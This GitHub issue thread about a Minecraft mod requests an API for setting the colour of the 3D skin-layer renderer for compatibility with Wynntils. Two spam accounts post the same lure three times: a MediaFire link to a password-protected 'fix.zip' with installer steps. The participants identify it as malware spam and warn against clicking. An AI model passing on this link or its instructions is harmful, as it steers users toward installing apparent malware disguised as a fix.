### ISSUE TITLE
[API Request] An event to set CustomLayerFeatureRenderer color for other mods compatibility

### ISSUE THREAD

**Issue by SteveKunG** [tr7zw/3d-Skin-Layers#173]
### About
I was trying to make 3D layer to be transparent with a Wynntils mod. Wynntils has a feature which set player model transparent when the other players are not in the same world.

Right now I created a PR on Wynntils repo which use a mixin to modify an argument on this line.
https://github.com/tr7zw/3d-Skin-Layers/blob/main/src/main/java/dev/tr7zw/skinlayers/renderlayers/CustomLayerFeatureRenderer.java#L140

PR: https://github.com/Wynntils/Wynntils/pull/2788

### Issue
Currently there is no way to set the model color unless using mixin injecting code into the mod. But this is too dangerous. So I'm requesting an API for set the color into CustomLayerFeature model.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SteveKunG** [comment]
Someone please get rid of those bot spam accounts. DO NOT CLICK THAT LINK!

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tr7zw** [comment]
Freaking amazing that there are now malware spam bots on Github.

**Comment by tr7zw** [comment]
With the new compatibility mode, this shouldn't be needed anymore (just change the vanilla layer color, it should apply to the 3d layer correctly).
